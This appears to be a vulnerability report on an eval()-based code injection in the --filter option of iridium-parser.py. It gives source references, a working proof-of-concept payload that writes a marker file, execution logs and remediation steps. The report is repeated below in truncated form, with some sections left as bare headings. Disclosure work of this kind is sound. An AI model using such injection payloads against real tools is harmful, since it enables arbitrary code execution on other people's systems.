1. Summary
A code execution vulnerability exists in iridium-parser.py where the --filter option accepts a free-form check expression and evaluates it with Python eval() during line processing.
If an attacker can control the --filter value, they can execute arbitrary Python code with the privileges of the user running the parser.
2. Affected Component
- Script: iridium-parser.py
- Argument: --filter
- Vulnerable behavior: untrusted expression passed to eval()
3. Source Code Evidence
- Filter parsing stores untrusted check substring:
iridium-parser.py:21, iridium-parser.py:24
- CLI accepts --filter:
iridium-parser.py:45
- Unsafe sink (eval):
iridium-parser.py:336
- Documentation confirms expression-based check format:
README.md:154, README.md:157
4. Impact
Successful exploitation allows:
- Arbitrary file write/modify
- Local command execution via Python runtime
- Data access under current user context
This is especially risky when wrappers/services pass untrusted filter strings into --filter.
5. Trigger Conditions
- Attacker can influence --filter input.
- Parser processes at least one input line.
- Process runs with privileges valuable to attacker.
6. Reproduction Environment
- Repository: /home/swift/iridium-toolkit
- Commit: 8888124
- OS: Linux 6.8.0-101-generic x86_64 (Ubuntu)
- Python: 3.10.12
- Build requirement: none (direct script execution)
7. Proof of Concept
cd /home/swift/iridium-toolkit
cat > /tmp/itk_vuln2_input.bits <<'EOF'
RAW: i-1598047209-t1 841.3554 1625695104 A:OK I:00000000020 100% 0.04370 44 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
EOF
python3 iridium-parser.py
--filter "All,import('pathlib').Path('/tmp/itk_vuln2_marker').write_text('owned-by-filter-eval') or 1"
/tmp/itk_vuln2_input.bits
8. Execution Logs (Observed)
exit_code=0
-rw-rw-r-- 1 swift swift 20 Mar 17 15:23 /tmp/itk_vuln2_marker
marker_content=owned-by-filter-eval
stdout_lines=0
stderr_lines=0
Control run without malicious expression:
python3 iridium-parser.py --filter "All" /tmp/itk_vuln2_input.bits
exit_code=0
control_marker_exists=no
9. Root Cause
Untrusted user-controlled filter content is treated as executable code (eval) instead of parsed as constrained data.
10. Remediation Recommendations
- Remove eval from filter evaluation.
- Implement a restricted filter grammar (whitelisted fields/operators only).
- Reject function calls, imports, dunder access, and attribute traversal.
- Add regression tests for malicious payloads (import, calls, chained attributes).
11. Conclusion
The issue is real, reachable, and reproducible from source and runtime evidence.
This is not a fabricated report; it is a valid code execution vulnerability under realistic input-control conditions.
1. Summary
A code execution vulnerability exists in iridium-parser.py where the --filter option accepts a free-form check expression and evaluates it with Python eval() during line processing.
If an attacker can control the --filter value, they can execute arbitrary Python code with the privileges of the user running the parser.
2. Affected Component
3. Source Code Evidence
iridium-parser.py:21, iridium-parser.py:24
iridium-parser.py:45
iridium-parser.py:336
README.md:154, README.md:157
4. Impact
Successful exploitation allows:
This is especially risky when wrappers/services pass untrusted filter strings into --filter.
5. Trigger Conditions
6. Reproduction Environment
7. Proof of Concept
python3 iridium-parser.py
--filter "All,import('pathlib').Path('/tmp/itk_vuln2_marker').write_text('owned-by-filter-eval') or 1"
/tmp/itk_vuln2_input.bits
8. Execution Logs (Observed)
9. Root Cause
Untrusted user-controlled filter content is treated as executable code (eval) instead of parsed as constrained data.
10. Remediation Recommendations
11. Conclusion
The issue is real, reachable, and reproducible from source and runtime evidence.
This is not a fabricated report; it is a valid code execution vulnerability under realistic input-control conditions.